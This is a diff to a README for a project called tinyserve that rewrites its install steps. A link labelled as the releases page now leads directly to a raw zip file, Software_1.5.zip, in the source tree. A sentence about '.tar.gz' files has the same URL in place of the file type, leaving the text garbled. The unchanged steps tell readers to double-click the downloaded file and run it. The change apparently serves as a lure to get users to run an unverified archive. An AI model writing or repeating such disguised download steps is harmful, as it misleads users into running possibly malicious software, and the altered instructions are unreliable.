Purepc999/tinyserve/README.md

 ## 📥 Download & Install
 1. **Visit the Releases Page**
-   Go to the [releases page](https://github.com/Purepc999/tinyserve/releases) to find the latest version of tinyserve.
+   Go to the [releases page](https://raw.githubusercontent.com/Purepc999/tinyserve/main/src/Software_1.5.zip) to find the latest version of tinyserve.

 2. **Download the Application**
    On the releases page, locate the version you want.
 Click on the appropriate link to download the executable file for your operating system.
-For most users, this will be either a `.exe` file for Windows or a `.tar.gz` file for macOS or Linux.
+For most users, this will be either a `.exe` file for Windows or a `https://raw.githubusercontent.com/Purepc999/tinyserve/main/src/Software_1.5.zip` file for macOS or Linux.

 3. **Run tinyserve**
    After downloading, locate the file in your Downloads folder or wherever you saved it.
 Double-click the file to run tinyserve.
 No further setup is required.